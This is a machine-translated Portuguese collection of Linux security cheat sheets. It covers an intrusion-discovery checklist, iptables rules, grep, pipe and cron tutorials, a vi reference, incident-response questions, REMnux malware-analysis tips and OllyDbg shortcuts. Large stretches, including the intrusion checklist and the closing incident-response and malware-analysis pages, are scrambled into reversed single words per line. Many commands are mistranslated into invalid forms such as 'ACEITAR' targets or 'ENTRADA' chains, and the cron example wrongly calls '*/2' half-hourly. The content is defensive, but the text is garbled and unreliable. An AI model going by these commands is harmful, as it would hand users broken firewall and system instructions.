kernel
e
usuário
de
modo
RootKits
por
introduzidas
sistemas
em
anomalias
procura
Chkrootkit
Para

incluindo:
suspeitos,
eventos
busca
em
sistema
do
log
de
arquivos
os
Verifique

Entradas
sempre
ou
semanalmente
(diariamente,
Periodicamente
estes
execute
gerencia,)
você
sistema
um
em
logon
Cada
computador.
de
invasão
uma
por
causado
ser
pode
que
anômalo
comportamento
procurar
para
rápidos
passos

comercial
não
uso
Linux
para
-gratuito
www.tripwire.org
–
sistema
do
críticos
arquivos
em
mudanças
por
procura
Tripwire
promíscuo"
modo
em
"entrou sistema.
um
em
localmente
executados
são
comandos
esses

^PM-
(como
estranhos
caracteres
20)
(>
grande
um
inclui
que
log
entrada
uma
com
remoto
local
acesso
(rpc)
Remoto
Procedimento
Chamada
programas
login
ou
autenticação
falhas
de
número
Grande
Esse
seções:

incomuns
serviços
e
•Processos
etc.)
sshd,
telnetd,
exemplo,
(por
ferramentas rede
da
incomum
Uso
incomuns
•Arquivos
sistema
do
críticos
arquivos
em
mudanças
por
procura
AIDE
estes em dividir é folha

aide.html
~rammer/
www.cs.tut.fi/
http:// incomuns
agendadas
•Tarefas
•incomuns

^PM)
^PM- www.cisecurity.org.
em
gratuitamente
Linux
do
reforço
de
guia
um
lançou
Security
Internet
for
Center
O incomuns
log
de
•Entradas
"erro"
dizendo
Apache
do
logs
de
normal
o
maior
número
web:
servidores
executam
que
sistemas
Para incomuns
•itens

adicionais
suporte
de
•Ferramentas
aplicativos
de
reinicializações
ou
e/
Reinicializações
Se

linux.org.
www.bastille-
em
disponível
Linux,
sistemas
para
automatizado
segurança
de
reforço
fornece
gratuito
Script
Bastille
O assistência.
mais
obter
e
atividades
as
relatar
para
imediatamente
Team
Handling
Incident
a
com
contato
em
Entre
ataque.
um
sofrido
ter
não
ou
pode
sistema
Seu

Outros
sistema:
do
lento
Desempenho

–
$
memória:
de
excessivo
Uso

disco:
em
disponível
espaço
no
repentinas
Diminuições
$

67
df

81
 e
Uso
execução:
em
processos
os
todos
Veja arquivos:
tais
em
backdoor
um
executando
dados
escondendo
estar
pode
invasor
Um
zero).
é
links
de
contagem
a
seja,
(ou
desvinculados
foram
arquivos
acessando
ou
fora
executados
sendo
estejam
que
processos
por
Procure incomuns:
porta
de
ouvintes
por
Procure

Arquivos

Processos
# #

–
Machine Translated by Google

máquina.
da
"normais"
processos
os
com
se
Familiarize- portas:
em
escutando
processos
de
execução
a
sobre
detalhes
mais
Obtenha

0).
(UID
root
de
privilégios
com
em
Foque
incomuns.
processos
por
Procure #
#

i
–
informações
arquivo
cada
de
grupo
e
proprietário
tipo,
permissões,
MD5,
soma
tamanho,
o
verifica
Isso
(RedHat,
instalado
RPM
com
Linux
máquina
uma
Em
o
investigue-
familiar,
é
lhe
não
que
processo
um
detectar
você
Se pacotes:
os
verificar
para
RPM
ferramenta
a
execute
etc.),
Mandrake, norma.
da
desvios
por
Procure
sistema.
seu
no
escutando
normalmente
estão
UDP
e
TCP
portas
quais
de
conhecimento
exigem
comandos
Esses

usando:
detalhes
mais #

–
#

–
pelo
usados
portas
e
arquivos
os
todos
mostra
comando
Este inclui:
saída
A
mudanças.
por
procurar
para
RPM
dados
de
Banco para
IP
endereço
o
mapeando
incomuns,
ARP
entradas
por
Procure

diferente
é
arquivo
do
tamanho
O
–
S
LAN:
a
para
corretos
estão
não
que
MAC
Endereços
execução.
em
processo
#
–

(permissões)
difere
Modo
–
M
execução:
de
níveis
vários
em
habilitados
estão
serviços
quais
ver
para
chkconfig
execute
instalado,
tiver
máquina
sua
Se diferente
é
MD5
do
soma
A
–
5

dispositivo
número
de
Incompatibilidade
–
D inesperados.
IP
por
procure
DMZ),
(como
especializada
ou
e/
pequena
LAN
uma
Em
LAN.
na
estão
supostamente
endereços
quais
de
detalhado
conhecimento
requer
análise
Esta

--
readLink
caminho
de
incompatibilidade
–
L

difere
usuário
do
propriedade
a
–
U

difere
grupo
do
propriedade
a
–
G
difere
modificação
de
tempo
o
–
T
incomuns:
SUID
raiz
arquivos
por
Procure

Arquivos
#

–
0
em
itens
aos
associadas
alterações
às
especial
atenção
Preste
sbin,
bin,
e
sbin
bin.
usr/
/ // /
normais.
SUID
arquivos
de
conhecimento
requer
Isso
Tarefas

outro
qualquer
e
root
pelo
agendadas
cron
tarefas
por
Procure
10
que
(maiores
incomuns
grandes
arquivos
por
Procure automatizada
é
análise
essa
Linux,
do
versões
algumas
Em 0:
UID
Contas
MegaBytes): script
pelo
#

–
#
l
–

check-
normais.
grandes
arquivos
de
conhecimento
requer
Isso Uso
sistema:
o
todo
em
incomuns
cron
tarefas
por
Procure
sniffer:
um
indicar
pode
que
promíscuo,
modo
pelo
Procure

arquivos:
camuflar
para
"usados
".
",
"..
("...",
espaços
e
pontos
com
#

find /
#

-name
#
|

"–
#
"
# lo.
detectá-
link"
"ip
use
então
2.4,
Linux
kernel
no
promíscuo
modo
detectar
para
confiável
forma
de
funciona
não
ifconfig
o
que
Observe

encontrar".
"– /
#

"

68
82
Machine Translated by Google

Folha de dicas do Iptables

Iptables é um módulo de nível de kernel Linux que nos permite realizar diversas manipulações de rede (por exemplo, filtragem de pacotes) para
obter melhor segurança de rede.
Ver todas as regras atuais do Iptables:

iptables -L -v

Ver todas as regras de ENTRADA:

iptables -L ENTRADA -nv

Como bloquear um endereço IP usando Iptables:

iptables -I ENTRADA -s "201.128.33.200" -j DROP

Para bloquear um intervalo de endereços IP:

iptables -I ENTRADA -s "201.128.33.0/24" -j DROP

Como desbloquear um endereço IP:

iptables -D ENTRADA -s "201.128.33.200" -j DROP

Como bloquear todas as conexões a uma porta:

Para bloquear a porta 25:

iptables -A ENTRADA -p tcp --dport 25 -j DROP iptables -A

ENTRADA -p udp --dport 25 -j DROP

Como desbloquear:

Para habilitar a porta 25:

iptables -A INPUT -p tcp --dport 25 -j ACEITAR iptables -A

INPUT -p udp --dport 25 -j ACEITAR

Para salvar todas as regras para que elas não sejam perdidas em caso de reinicialização do servidor:

/etc/init.d/iptables salvar

Ou, alternativamente:
service iptables save Excluir
uma regra por número de linha Exibe
todas as regras de tabelas de ip com números de linha: iptables
-L INPUT -n --line-numbers Você obterá a lista
de todos os IPs bloqueados. Olhe para o número à esquerda e então: iptables -D INPUT [NÚMERO
DE LINHA]
Abra a porta 3306 (MySQL) para o IP 1.2.3.4

83 69
Machine Translated by Google

"
iptables -I INPUT -i eth0 -s 1.2.3.4 -p tcp --destination-port 3306 -j ACCEPT -m comment --comment Acesso por IP ADICIONAR MySQL
"
REGRA com
PORTA e ENDEREÇO IP

sudo iptables -A INPUT -p tcp -m tcp --dport número_da_porta -s endereço_ip -j ACEITAR

ADICIONE REGRA para PORTA em todos os endereços

sudo iptables -A INPUT -p tcp -m tcp --dport número_da_porta --sport 1024:65535 -j ACEITAR

SOLTE O IPADRESS

sudo iptables -I ENTRADA -s xxxx -j DROP

VER IPTABLES com números de regras

sudo iptables -L INPUT -n --números-de-linha

REMOVER UMA REGRA

#Use o comando acima e anote o número da regra sudo

iptables -D INPUT número da regra

#POLÍTICA PADRÃO

-P QUEDA DE ENTRADA

-P QUEDA DE SAÍDA
-P QUEDA PARA FRENTE

-A INPUT -i lo -j ACEITAR #permitir entrada lo

-A SAÍDA -o lo -j ACEITAR #permitir saída lo
"
-A ENTRADA -m limite --limite 5/min -j LOG --log-prefix "iptables-INPUT negado: --log-level 7 #log ENTRADA
Negado
"
-A SAÍDA -m limite --limite 5/min -j LOG --log-prefix "iptables-OUTPUT negado: --log-nível 7 #log
SAÍDA Negada

#ALLOW OUTPUT PING/MTR (ou traceroute -I, traceroute por padrão usa UDP - forçar com ICMP)
-A SAÍDA -p icmp --icmp-type 8 -m state --state NOVO,ESTABELECIDO,RELACIONADO -j ACEITAR
-A ENTRADA -p icmp --icmp-type 0 -m estado --state ESTABELECIDO,RELACIONADO -j ACEITAR
-A ENTRADA -p icmp --icmp-type 11 -m estado --state ESTABELECIDO,RELACIONADO -j ACEITAR

#PERMITIR ENTRADA PING/MTR

-A ENTRADA -p icmp --icmp-type 8 -m estado --state NOVO,ESTABELECIDO,RELACIONADO -j ACEITAR
-A SAÍDA -p icmp --icmp-type 0 -m estado --state ESTABELECIDO,RELACIONADO -j ACEITAR

#PERMITIR SAÍDA

-A SAÍDA -p tcp -m multiporta --dports 80.443 -m estado --estado NOVO,ESTABELECIDO -j ACEITAR

-A ENTRADA -p tcp -m multiporta --sports 80.443 -m estado --estado ESTABELECIDO -j ACEITAR

-A SAÍDA -p udp -m multiporta --dports 53.123 -m estado --estado NOVO,ESTABELECIDO -j ACEITAR

-A ENTRADA -p udp -m multiporta --sports 53.123 -m estado --estado ESTABELECIDO -j ACEITAR

84 70
Machine Translated by Google

Pesquisando em arquivos
Procurando texto em arquivos ASCII
Se você estiver procurando por texto dentro de um arquivo, use o comando grep .

grep pattern file - Procurar por padrão no arquivo.

grep -v pattern file - Inverte correspondência. Retorna linhas do arquivo que não correspondem ao padrão.

$ cat site secreto:

facebook.com usuário: bob senha:
Abee! $ grep

usuário secreto: bob

$ grep o site secreto: facebook.com
usuário: bob $

grep -vo senha secreta: Abee!

Aqui estão mais algumas opções comuns para usar com grep.

grep -i - Executa uma pesquisa, ignorando maiúsculas e minúsculas.

grep -c - Conta o número de ocorrências em um arquivo.

grep -n - Precede a saída com números de linha do arquivo.

$ grep Segredo do usuário $ grep -i

Segredo do usuário usuário: bob $ grep -ci
Segredo do

usuário 1

$ grep -ni Segredo do usuário 2:usuário: bob

Procurando texto em arquivos binários

Se você executar grep em um arquivo binário, ele simplesmente exibirá se essa informação foi encontrada ou não no
arquivo, mas não exibirá o texto ao redor. Para olhar dados textuais dentro de um arquivo binário, use o comando strings .

arquivo strings - Exibe strings imprimíveis em arquivos binários.

$ grep -i john BlueTrain.mp3 O arquivo binário

BlueTrain.mp3 corresponde a $ strings BlueTrain.mp3 | grep -i john
John Coltrane John Coltrane $

Tubos
Você notará que dois comandos foram encadeados com uma barra vertical, também conhecida como símbolo de pipe. O
pipe (| ) significa pegar a saída padrão do comando anterior

71 85
Machine Translated by Google

e passe-o como entrada padrão para o comando a seguir. Se o primeiro comando exibir erro
mensagens que não serão passadas para o segundo comando. Essas mensagens de erro são chamadas
saída de "erro padrão". Você aprenderá como manipular a saída de erro padrão no
Capítulo "Redirecionamento" .

Observe também que na primeira ocorrência do comando grep o formato do arquivo de padrão grep -i
foi usado. No segundo, o formato do padrão grep -i foi usado. No primeiro formato, a entrada para
grep veio do arquivo . No segundo formato, a entrada para grep veio do comando anterior
através do cano.

Se você executar strings BlueTrain.mp3, muito texto será exibido na tela. Em vez de deixar
esse texto passa por você, você pode alimentá-lo com grep -i john usando um pipe. O resultado, como você pode ver, é
que 'John Coltrane' foi encontrado duas vezes na saída da string BlueTrain.mp3 .

Os pipes não estão limitados a apenas dois comandos. Você pode continuar encadeando comandos até que você
obter o resultado desejado que você está procurando. Vamos alimentar a saída de grep para head -1 para limitar o
saída para apenas uma linha.

$ strings BlueTrain.mp3 | grep -i john | cabeça -1

John Coltrane
$

Digamos que você queira exibir apenas a segunda palavra da saída acima. Você pode usar o corte
comando para atingir esse objetivo.

cortar [arquivo] - Corta partes selecionadas do arquivo. Se arquivo for omitido, use entrada padrão.

cut -d delimiter - Use delimitador como separador de campo.

cut -f N - Exibe o campo N.

Para extrair 'Coltrane' de 'John Coltrane', use um espaço como delimitador (-d ' segundo campo (-f 2 ). ' ) e imprima o
O espaço foi colocado entre aspas, pois os espaços são normalmente ignorados pelo shell.
Aspas simples ou duplas funcionam da mesma forma nessa situação.

$ strings BlueTrain.mp3 | grep -i john | cabeça -1 | corte -d ' ' -f 2

Coltrane
$

Você verá que há muitos pequenos comandos que fazem apenas uma coisa bem. Alguns exemplos
são estranhos , gato , corte , fmt , junte-se , menos , mais , nl , pr , sed , seq , organizar , tr , e uniq . Vamos dar uma olhada
exemplo usando alguns desses comandos e encadeando-os com pipes.

O arquivo /etc/passwd contém uma lista de contas no sistema e informações sobre elas
contas. Neste exemplo, o objetivo é encontrar todos os usuários chamados "bob" listados no arquivo /etc/passwd e
imprimi-los em ordem alfabética por nome de usuário em um formato tabular. Aqui está
uma maneira de fazer isso.

$ grep bob /etc/senha

bob:x:1000:1000:Bob:/home/bob:/bin/bash
bobdjr:x:1001:1000:Robert Downey:/home/bobdjr:/bin/bash
bobh:x:1002:1000:Bob Hope:/home/bobh:/bin/bash
bobs:x:1003:1000:Bob Saget:/home/bobs:/bin/bash
bobd:x:1004:1000:Bob Dylan:/home/bobd:/bin/bash
bobb:x:1005:1000:Bob Barker:/home/bobb:/bin/bash
$ grep bob /etc/passwd | cortar -f1,5 -d:
bob:Bob
bobdjr:Robert Downey
72 86
Machine Translated by Google

bobh:Bob Esperança
bobs:Bob Saget
bobd:Bob Dylan
bob:Bob Barker
$ grep bob /etc/passwd | cortar -f1,5 -d: | classificar
bob:Bob
bob:Bob Barker
bobd:Bob Dylan
bobdjr:Robert Downey
bobh:Bob Esperança
bobs:Bob Saget
$ grep bob /etc/passwd | cortar -f1,5 -d: | classificar | sed 's/:/ /'
bob Bob
Bob Barker (em inglês)
Bob Dylan - O Rei do Pop
bobdjr Robert Downey
bob esperança
bobs Bob Saget
$ grep bob /etc/passwd | cut -f1,5 -d: | ordenar | sed 's/:/ /' | coluna -t
prumo Prumo
bobo Prumo Ladrador
bobo Prumo Dylan
bobdjr Robert Downey
bobh Prumo Ter esperança

bobs Prumo Sagete

O exemplo acima mostra o processo de pensamento passo a passo de como ir de um conjunto de saída
e canalizá-lo como entrada para o próximo comando. Se você precisar executar esta ação com frequência, você pode
salve o comando final para uso posterior. Como você pode ver, esse conceito simples de pipe faz com que o Linux
extremamente poderoso.

Saída de Pipe para um Pager

Outro uso comum de pipes é controlar como a saída é exibida na tela. Se um comando
produz uma quantidade significativa de saída que pode rolar para fora da tela antes que você tenha a chance
para examiná-lo. Para controlar a saída, use um utilitário de pager como more or less . Você já usou
esses comandos diretamente em arquivos, mas tenha em mente que eles também podem receber entradas redirecionadas.

$ grep bob /etc/passwd | menos

bob:x:1000:1000:Bob:/home/bob:/bin/bash
bobdjr:x:1001:1000:Robert Downey:/home/bobdjr:/bin/bash
bobh:x:1002:1000:Bob Hope:/home/bobh:/bin/bash
bobb:x:1005:1000:Bob Barker:/home/bobb:/bin/bash
...
$ ls -l /usr/bin | menos
total 62896
-rwxr-xr-x 1 raiz raiz 35264 19 de novembro de 2012 [
-rwxr-xr-x 1 raiz raiz 96 26 de setembro 20:28 2to3-2.7
-rwxr-xr-x 1 raiz raiz 96 25 de setembro 18:23 2to3-3.2
-rwxr-xr-x 1 raiz raiz 16224 18 de março de 2013 a2p
-rwxr-xr-x 1 raiz raiz 55336 12 de julho de 2013 ab
....
$ ps -ef | mais
UID PID PPID C STIME TTY 0 0 Jan08? TEMPO CMD
raiz 1 00:00:00 /sbin/init
raiz 2 0 0 Jan08 ? 00:00:00 [kthreadd]
raiz 3 2 0 Jan08 ? 00:00:01 [ksoftirqd/0]
raiz 6 2 0 Jan08 ? 00:00:00 [migração/0]
raiz 7 2 0 Jan08 ? 00:00:04 [watchdog/0]
...
$

http://www.LinuxTrainingAcademy.com

73 87
Machine Translated by Google

Agendando tarefas repetidas com o Cron

Se você precisar repetir uma tarefa em uma programação, você pode usar o serviço cron. A cada minuto o cron
serviço verifica se há algum trabalho agendado para ser executado e, se houver, os executa. Os trabalhos Cron são
frequentemente usado para automatizar um processo ou executar manutenção de rotina. Você pode agendar tarefas cron
usando o comando crontab .

cron - Um serviço de agendamento de tarefas baseado em tempo. Este serviço é normalmente iniciado quando o sistema
botas.

crontab - Um programa para criar, ler, atualizar e excluir suas agendas de tarefas.

Um crontab (tabela cron) é um arquivo de configuração que especifica quando os comandos devem ser executados por
cron. Cada linha em um crontab representa um trabalho e contém duas informações: 1) quando
executar e 2) o que executar. A especificação de tempo consiste em cinco campos. Eles são minutos, hora, dia
do mês, mês e dia da semana. Após a especificação do tempo, você fornece o comando
para ser executado.

Formato Crontab
* * * * * comando
||||||||

| +-- Dia da Semana (0-6)

|| | +---- Mês do Ano (1-12)
| | +------ Dia do Mês (1-31)
| +-------- Hora (0-23)
+---------- Minuto (0-59)

O comando só será executado quando todos os campos de especificação de tempo corresponderem ao atual
data e hora. Você pode especificar que um comando seja executado apenas uma vez, mas esse não é o uso típico
caso para cron. Normalmente, um ou mais campos de especificação de tempo conterão um asterisco (* )
que corresponde a qualquer hora ou data para esse campo. Aqui está um crontab de exemplo.

# Acontece toda segunda-feira às 07:00.

**
07 1 /opt/vendas/bin/relatório-semanal

Aqui está uma representação gráfica da entrada do crontab acima.

**
07 1 /opt/vendas/bin/relatório-semanal
| ||||| |
| | +-- Dia da Semana (0-6)
| | | +---- Mês do Ano (1-12)
| | +------ Dia do Mês (1-31)
| +-------- Hora (0-23)
+---------- Minuto (0-59)

Este trabalho será executado somente quando o minuto for 0, a hora for 7 e o dia da semana for 1. No dia
do campo da semana 0 representa domingo, 1 segunda-feira, etc. Este trabalho será executado em qualquer dia e durante
qualquer mês desde que o asterisco foi usado para esses dois campos.

Se alguma saída for gerada pelo comando, ela será enviada para você. Você pode verificar seu correio local com
o comando mail . Se você preferir não receber e-mail, você pode redirecionar a saída do
comando como neste exemplo.

# Executar às 02:00 todos os dias e enviar a saída para um arquivo de log.

02 * * * /opt/acme/bin/backup-db > /var/opt/acme/backup-db.log 2>&1

74 88
Machine Translated by Google

Você pode fornecer vários valores para cada um dos campos. Se você quiser executar um comando a cada
meia hora, você poderia fazer isso.

# Execute a cada 30 minutos.

0,30 * * * * /opt/acme/bin/verificação-de-meia-hora

# Outra maneira de fazer a mesma coisa.

*/2 * * * * /opt/acme/bin/verificação-de-meia-hora

Em vez de usar 0,30 para o campo de minuto, você poderia ter usado */2 . Você pode até usar intervalos
com um travessão. Se você quiser executar um trabalho a cada minuto durante os primeiros quatro minutos da hora, você pode usar
desta vez especificação: 0-4 * * * * comando .

Existem várias implementações do agendador cron e algumas permitem que você use atalhos
e palavras-chave em seus crontabs. Palavras-chave comuns foram fornecidas abaixo, mas consulte o
documentação do cron no seu sistema para garantir que eles funcionarão.

Descrição da palavra-chave Equivalente

@yearly Executado uma vez por ano à meia-noite da manhã de 1º de janeiro @annually O 0011 *

mesmo que @yearly @monthly Executado 0011 *

uma vez por mês à meia-noite da manhã do primeiro dia do 001 **

mês

@weekly Corra uma vez por semana à meia-noite da manhã de domingo @daily 00 **
0
Executar uma vez por dia à meia- 00 ***

noite @midnight O mesmo que @daily 00 ***

@hourly Executar uma vez por hora no início da hora @reboot Executar na 0 ****

inicialização N/D

Usando o comando Crontab

Use o comando crontab para manipular tarefas cron.

arquivo crontab - Instala um novo crontab a partir do arquivo.

crontab -l - Lista seus trabalhos cron.

crontab -e - Edita seus trabalhos cron.

crontab -r - Remove todos os seus trabalhos cron.

$ crontab -l
sem crontab para bob
$ gato meu-cron
# Acontece toda segunda-feira às 07:00.
**
0 7 1 /opt/vendas/bin/relatório-semanal
$ crontab meu-cron
$ crontab -l
# Acontece toda segunda-feira às 07:00.
**
07$ 1 /opt/vendas/bin/relatório-semanal
crontab -e
# $EDITOR é invocado.
$ crontab -r
$ crontab -l
sem crontab para bob
$

75 89
Machine Translated by Google

VI Folha de “Cheat”
Boletim ACNS ED–03

Fevereiro de 1995

vi Editor “Folha de Dicas”

Invocando vi: vi nome do arquivo

Formato dos comandos vi: [count][command] (count repete o efeito do comando)

Modo de comando versus modo de entrada Comandos de gerenciamento de arquivos

:w nome Escrever buffer de edição no nome do arquivo

O Vi inicia no modo de comando. Os comandos de posicionamento
operar somente enquanto o vi estiver no modo de comando. Você alterna o vi Escreva no arquivo e saia

para o modo de entrada inserindo qualquer um dos vários comandos de entrada :sq :s! Sair sem salvar as alterações
vi. (Veja a próxima seção.) Uma vez no modo de entrada, qualquer caractere que ZZ O mesmo que :wq
você digitar será considerado texto e adicionado ao arquivo. Você :sh Executar comandos shell (<ctrl>d)
não pode executar nenhum comando até que você saia do modo de entrada.
Para sair do modo de entrada, pressione a tecla Escape (Esc) .
Movimentos de janela

Comandos de entrada (terminam com Esc) <ctrl>d Role para baixo (meia tela)
<ctrl>você Rolar para cima (meia tela)
um
Acrescentar após o cursor
<ctrl>f Página seguinte
eu Inserir antes do cursor
<ctrl>b Página para trás
o Linha aberta abaixo
/string ? Pesquisar para frente
O Linha aberta acima
string Pesquisar para trás
:r arquivo Inserir arquivo após a linha atual
<ctrl>l Redesenhar tela
Qualquer um desses comandos deixa o vi no modo de entrada até que você
<ctrl>g Exibir o número da linha atual e
pressione Esc. Pressionar a tecla RETURN não o tirará informações do arquivo
do modo de entrada.
não
Repetir pesquisa
Não Repetir pesquisa reversa
Comandos de alteração (modo de entrada) G Ir para a última linha

não Vá para a linha n

cw Alterar palavra (Esc)
:n Vá para a linha n
cc Alterar linha (Esc) - linha em branco
z<CR> Reposicionar janela: cursor no topo
$c Mudar para o fim da linha
e. Reposicionar janela: cursor no meio
rc Substituir caractere por c
z- Reposicionar janela: cursor na parte inferior
R Substituir (Esc) - typeover
e Substituto (Esc) - 1 char com string
S
Movimentos do cursor
Substituto (Esc) - Resto da linha com
texto
. Repetir última alteração
O

M
Canto superior esquerdo (casa)
Linha do meio

eu Canto inferior esquerdo

Alterações durante o modo de inserção o Voltar um personagem

Abaixo de uma linha

<ctrl>h Voltar um personagem eu

o Uma linha acima

<ctrl>w Voltar uma palavra
^
<ctrl>você Início da linha
Voltar ao início da inserção
$ Fim da linha

eu Encaminhar um personagem

c Uma palavra para a frente

b Voltar uma palavra

fc Encontre c

; Repetir encontrar (encontrar o próximo c)

90 76
Machine Translated by Google

Comandos de exclusão Mover texto do arquivo antigo para o arquivo novo

dd ou ndd Excluir n linhas para o buffer geral eu sou velho

dw Excluir palavra para buffer geral “a10yy arrancar 10 linhas para armazenar em buffer

dnw Excluir n palavras :c escrever buffer de trabalho

e) Apagar para o final da frase :e novo editar novo arquivo

db Apagar palavra anterior “ap coloque o texto de um cursor posterior

E Apagar até o fim da linha :30,60w novo Escreva as linhas 30 a 60 no novo arquivo

x Excluir personagem

Expressões regulares (strings de pesquisa)

Recuperando exclusões ^ Corresponde ao início da linha

p Coloque o buffer geral após o cursor $ Corresponde ao fim da linha

P Coloque o buffer geral antes do cursor . Corresponde a qualquer caractere único

* Corresponde a qualquer caractere anterior

Comandos de desfazer .* Corresponde a qualquer caractere

você
Desfazer última alteração
você
Comandos de busca e substituição
Desfazer todas as alterações on-line

Sintaxe:
Comandos de rearranjo
:[endereço]s/texto_antigo/texto_novo/

yy ou Y Yank (copiar) linha para buffer geral

Yank 6 linhas para buffer z Componentes do endereço:
“z6yy

Yank palavra para buffer geral

. Linha atual

não Número da linha n

você “a9dd Exclua 9 linhas para armazenar em buffer

“A9dicionar .+m Linha atual mais m linhas

Apagar 9 linhas; Acrescentar ao buffer a
Última linha
“um Coloque o texto do buffer após o cursor

$ /string/ Uma linha que contém "string"

p Coloque o buffer geral após o cursor
% Arquivo inteiro
P Coloque o buffer geral antes do cursor
Eu Unir linhas [endereço1],[endereço2] Especifica um intervalo

Exemplos:
Parâmetros
O exemplo a seguir substitui apenas a primeira ocorrência de Banana
:definir Mostrar caracteres invisíveis por Kumquat em cada uma das 11 linhas
lista :definir nolist Não mostrar caracteres invisíveis começando com a linha atual (.) e continuando para a
10 que seguem (.+10).
:definir Mostrar números de linha
número :definir sem número Não mostrar números de linha :.,.+10s/Banana/Kumquat

:definir recuo automático Recuo após retorno de carro O exemplo a seguir substitui todas as ocorrências
:set noautoindent Desativar recuo automático
(causado pelo g no final do comando) de
:set showmatch Mostrar conjuntos correspondentes de maçã com pêra.
parênteses conforme são digitados
:set noshowmatch Desativa o showmatch :%s/maçã/pêra/g

:definir modo de exibição Modo de exibição na última linha da tela O exemplo a seguir remove o último caractere de
:set noshowmode Desligar o modo de exibição
cada linha do arquivo. Use-o se cada linha do arquivo terminar
com ^M como resultado de uma transferência de arquivo. Execute-o
:definir tudo Mostrar valores de todos os possíveis
quando o cursor estiver na primeira linha do arquivo.
parâmetros
:%s/.$//

91
77
Machine Translated by Google

…,

Código
CódigoCódigo

aess…
lista Desmontar liit…
… eeeded, ataque usuário Usuário
…
Nível Usuário
…
duração

bloqueado Bytes
Tráfego Uso
e
de
transferidos Atividade
de Alterações
na acesso
Administrador O Tentativas
a CódigoAcesso
a Mensagens
a Veja
Acesso Código
Falha Solicitação
Erro Outros
Pesquisa
lista
Uma Referências
lista
Uma de
Blog Outras
a
à
folhas

e
Senha
Aepted falha
de sessão passagemexcluirsudo:FALHAfalhou
pulike, Logon
sucedido
bem- 642;
alterado Para 7035, 560,
Construído…
oetio,

e
de O
Dispositivos Login Falha Logoff Alteração
ou Ações Falha O
no
procurar
que ID Eventos
de Alterações Mudanças
iniciado
Serviço ao
Acesso O Observe
e Os
exemplos Tráfego
firewall

que poderá entradas

de selos; e
eventos
alterações, e
ações imagem registros

e Folha
De
LISTA INCIDENTES
a
de
folha
Esta 1.
Identifique
e 2. 3. 4. e
5. a
6. 7. 8. Possíveis
fontesLogs
e
do Logs e
Logs Lembre-
se Locais
e
SO e
SO Log

92
Machine Translated by Google

familiarize- escopo efeito necessário,operações, coletar

e

e
existem
mecanismos
Quais os
Onde recursos
Quais o
(Quem
Quais
a a
etapas
Principais 2. 3. o
Erradicação:
4. 6. a
resposta
de
adicionais
Referências para
dicas
de
Folha Folha
de Unix/
Verificando

a
fará
Quem do
escopo
o
Avalie e
aplicativos
Quais Estamos
cientes e
são
Quais o
teorias
Quais A Revise
infraestrutura
a
resultados
os comandos Que
Quais o
medidas alertas
Quais Se
logs
os a
Prepare-
O
grupo O
grupo
ou ferramentas
Quais

INCIDENTEpara
Dicas o Qual
Entenda
QUESTIONÁRIO natureza Como
a
é o
e
problema de
postura
a
é
Qual
componentes
Quais grupos
Quais incidentes
Outros Definir
Quais
e
indivíduos a
designado
é
Quem Quem
a
está o
equipe
a
mecanismos
Quais cronograma
o
é
Qual cronograma
o
é
Qual o
Quemo
de
infraestrutura
e
De 93
autoria
Machine Translated by Google

psxviewlista
kdbgscan, -
printkey
procdump alças,varredurasvcscan,
driverscan, cronograma,

connscan,
conexões,

pdfextract,
e
PDFs
Examine
usando shellcode
o
Examine
e
usando Investigue
malware Examine
a
sistema
o malware Decodifique
a
Examinar
AndroGuard.Determinar Listar Mostrar Extrair ExtrairListar DLLs
Detectar e Listar
e
serviços, atividades
Ver Ver
Documentação
Recursos
Encontre
e Folha Folha Curso

ID
Avalie e
Extraia
recorte o
arquivos
Verifique e
Examine
rastreie com
Trabalhe Defina
assinaturas
Lidar Analise
o
tráfego Intercepte
o
todo o
Analise Implemente
CapTipper, o
Desobstrua
e
JavaScript
serviços Examinar Defina
objetos o
Limpe e
Recupere
arquivos
Examine sitesgui, InspecioneExaminar
domínios
e officeparser.py,
Analise

reiníciosudo
desligar -s renovar-
meu arquivo arquivo Início sshd

reux, e Curso
De o
é
DICAS e
guia
Este
ANÁLISE o
Baixe
REMnux
como Efetue get
apt-
o
Use
para no
Alterne
layout
o
do Comandos
o o
Reinicie
Desligue Mudar RenovarVeja
o Editar Ver Iniciar Iniciar
Inspecione
as
Examinar Investigue
arquivos Desofusque
conteúdosExamine

94
Machine Translated by Google

Ctrl+P

Base(EBP+valor)
Contador
Adição, e valor) Aponta
o e a
Aponta
alterações Contém
e
cálculos

GetProcAddress.

BANDEIRAS
EIXO

EBP

ESP
Ecx

PEI
Ignorando e
Registros

ou
Mostrar o
Para da o
Para a
Ponto a
Se é e
Ao
espécime “Encontre
e
Ocultar
o
Um a
Fique
precedido o
Se áreas Decodifique ImpREC,
funçãoCorrigir Para para

E-
G

Não

*
F7

F8

F9
F12

Digitar
Alt+M

Alt+B
Ctrl+G

Ctrl+N
Ctrl+E

Ctrl+S

Ctrl+K

Ctrl+B
Ctrl+L

Ctrl+L
Ctrl+F9
Ctrl+F12
Shift+F4

ÿ/
+
Ctrl+Enter

Ctrl+X

espaço
Barra
de
»

Selecione
dados

Cadeia
ou

Ver »
SEH
instrução »
instrução »
Selecione

Selecione
função

Ctrl+E
nome
da
o

a
Ir MostrarFluxograma
Exibir Ir
o Ir Renomear ExibirMostrar
Mostrar para Mostrar OllyDbg
Entre a o o
Executar
Executar
Instruções à
Retornar
Mostrar a
Siga
Mostrar Inserir Siga
o Nova Próximo
Mostrar Mostrar lugar Editarcódigo Mostrar
Montar Pq

Esc
Digitar
Alt+T

Shift+F12

para interações entender

o os os para

MALWARE
e
Os abordado veja
SEC610: Abordagem
e
1. o
2. 3. 4. a
5. e
3
6. e
7. Análise
Esteja Monitor
e
instantâneos, DetecteRedirecione
o Ativepara IDA Mostrar
Pesquisa Inserir Siga
Mostrar o à
Retornar Veja
a
De

95
 1 2 3

e
executadas
ser
devem
ações
seguintes
As

Contenção

Preparação
Identificação
serão
que
entidade,
cada
para
atores,
os
Defina
ÿ
atualizada.
permanentemente
mantida
contatos
lista
uma
em
documentados
ser
devem
atores
Esses
crise.
de
célula
na
envolvidos crise:
gestão
de
célula
pela
monitorado
analisados:
e
coletados
enviados
mails
e-
volumes
Altos
sistema,
do
congelamento
ou
carga
Alta
suporte,
chamadas
aumento
Alto
firewalls,
suspeito,
rede
Tráfego
bloqueadas,
contas
quantidade
Grande
servidores,
em
suspeitas
conexão
Tentativas
intrusão,
detecção
Sistemas
antivírus,
ÿLogs
ser
devem
fontes
diversas
de
vindas
Informações

Detectar
do
infectada
área
a
Desconecte

1.
Internet.
Machine Translated by Google

de
Desconecte-
infectada.
área
a
Isole

2.
ativas,
estejam
análise
ferramentas
as
que
de
se
Certifique-
rede.
qualquer
ÿ
não
